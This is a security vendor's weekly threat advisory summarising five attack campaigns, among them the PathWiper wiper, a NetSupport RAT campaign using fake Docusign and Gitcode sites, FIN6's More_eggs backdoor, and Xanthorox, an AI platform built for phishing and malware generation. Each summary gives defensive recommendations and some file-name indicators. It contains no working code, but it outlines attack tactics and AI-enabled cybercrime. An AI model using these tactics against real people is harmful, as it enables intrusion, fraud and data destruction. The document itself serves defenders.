Xanthorox AI – Rise of Autonomous Malicious AI

In the past week, critical cybersecurity threats have emerged, with significant vulnerabilities being reported across various platforms. Recent cybersecurity incidents include:

1. PathWiper: An Advanced Destructive Malware Shows Tactical Evolution
2. Multi-Stage PowerShell Attack Distributing NetSupport RAT via Fake Docusign and Gitcode Sites
3. Xanthorox AI – An Autonomous Malicious AI
4. Rare Werewolf Leveraging PowerShell and Legitimate Apps in Russian Cyber Campaigns
5. FIN6 Leveraging Fake Resumes and AWS Infrastructure to Deploy More_eggs Malware

These developments underscore the urgent need for organizations to stay vigilant and apply security updates promptly.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. PathWiper: Advanced Destructive Malware Shows Tactical Evolution

A destructive cyberattack targeting critical infrastructure in Ukraine was uncovered by cybersecurity researchers, revealing the use of a new wiper malware dubbed PathWiper. The attackers exploited a legitimate endpoint administration tool, indicating privileged access and deep familiarity with the victim’s environment. Believed to be linked to a Russia-aligned APT, PathWiper uses advanced techniques to identify and wipe physical, logical, and network drives. It corrupts NTFS structures and the Master Boot Record (MBR), dismounting volumes using system-level commands before initiating data destruction.

Recommendations include securing endpoint administration consoles with strong authentication and monitoring for unusual script executions. Organizations should also set behavioral alerts for suspicious VBScript activity, mass file overwrites, or dismount volume commands. Maintaining isolated, verified backups is essential, along with limiting network share exposure and monitoring relevant registry paths like HKEY_USERS\Network. Threat hunting teams are advised to look for filenames such as sha256sum.exe or uacinstall.vbs to detect potential compromise early.

2. PowerShell Attack Distributes NetSupport RAT via Fake Docusign and Gitcode Sites

A new multi-stage malware campaign is exploiting spoofed websites that imitate services like Gitcode and Docusign to trick users into executing malicious PowerShell scripts. The attack begins with clipboard poisoning and CAPTCHA-based social engineering, prompting users to paste harmful code via the Windows Run dialog. This initiates a chain of PowerShell scripts that eventually installs NetSupport RAT, a legitimate tool often abused by threat actors. Persistence is established using binaries downloaded from GitHub.

Researchers note similarities with previous SocGholish (FakeUpdates) activity, and the use of legitimate infrastructure makes detection challenging. Obfuscation, script layering, and dynamic hosting help evade traditional defenses.

Recommendations include user training on the dangers of executing unknown scripts, blocking access to suspicious domains, enabling detailed PowerShell logging, disabling clipboard execution on sensitive endpoints, enforcing signed script policies, and hunting for anomalies such as jp2launcher.exe or connections to wbdims.exe on GitHub. Monitoring network traffic and clipboard behavior can help detect and stop similar attacks early.

3. Xanthorox AI – Rise of Autonomous Malicious AI

Xanthorox AI is a next-gen black-hat AI platform built specifically for cybercrime. Unlike jailbroken chatbots like WormGPT, it’s a fully offline, modular system capable of phishing, malware creation, reconnaissance, social engineering, and deepfake-enabled attacks. It operates on dark web infrastructure without relying on public APIs, making it exceptionally hard to detect. Its architecture includes five components: a malware generator (Xanthorox Coder), image/data extractor (Vision), phishing content creator (Reasoner Advanced), voice and file handler, and a custom OSINT engine scraping over 50 sources.

Real-world use includes phishing attacks on a U.S. bank and executive voice cloning for fraud.

Recommended defenses include behavior-based threat detection, memory-resident malware sensors, voice liveness checks, and sandboxing for malware analysis. Organizations should train staff using AI-generated phishing simulations and enforce Zero Trust execution policies. Security leaders are urged to prioritize adaptive AI-resistant controls, enhance SOAR playbooks, and align closely with MXDR partners to detect and contain such sophisticated threats.

4. Rare Werewolf Leveraging PowerShell and Legitimate Apps in Cyber Campaigns

The threat actor Rare Werewolf (formerly Rare Wolf) has re-emerged, targeting Russia and CIS regions with stealthy attacks focused on remote access, credential theft, and cryptocurrency mining using tools like XMRig. Their campaigns rely on legitimate third-party software such as AnyDesk, Blat, and WebBrowserPassView to evade detection. Intrusions begin with phishing emails containing password-protected payloads and use scheduled PowerShell tasks to automate access and exfiltration during off-hours.

A parallel group, DarkGaboon, is also active, deploying LockBit 3.0 ransomware via phishing lures containing RTF documents and .scr executables. Their focus appears to be encryption without data exfiltration, relying on leak site extortion tactics.

Recommendations include blocking password-protected attachments, disabling script execution where not needed, detecting suspicious tool usage, monitoring for unusual PowerShell activity, and deploying behavior-based endpoint controls. For ransomware defense, regular offline backups, segmentation, CDR for attachments, and active threat hunting for LockBit, XWorm, and Revenge RAT are strongly advised.

5. FIN6 Leverages Fake Resumes and AWS Infrastructure to Deploy More_eggs Malware

The FIN6 threat group is distributing More_eggs, a JavaScript-based backdoor, by impersonating job seekers on platforms like LinkedIn and Indeed. Victims receive links to fake resumes hosted on AWS infrastructure, leading to ZIP files containing the malware. More_eggs enables credential theft, remote access, and follow-on attacks, including ransomware delivery.

The campaign uses advanced evasion techniques such as CAPTCHA gates and conditional payload delivery—targeting only Windows users on residential IPs, while serving benign content to VPNs or scanners. Domains are registered through GoDaddy with privacy protection, making attribution difficult.

Recommendations include training HR teams to avoid unsolicited resume downloads from unknown domains, sandboxing resume file reviews, monitoring cloud service traffic, and using behavioral detection tools for JavaScript threats. Organizations should block known campaign domains and report any suspicious AWS-hosted content to AWS Trust & Safety. This campaign highlights the need for vigilance even in everyday operations like recruitment.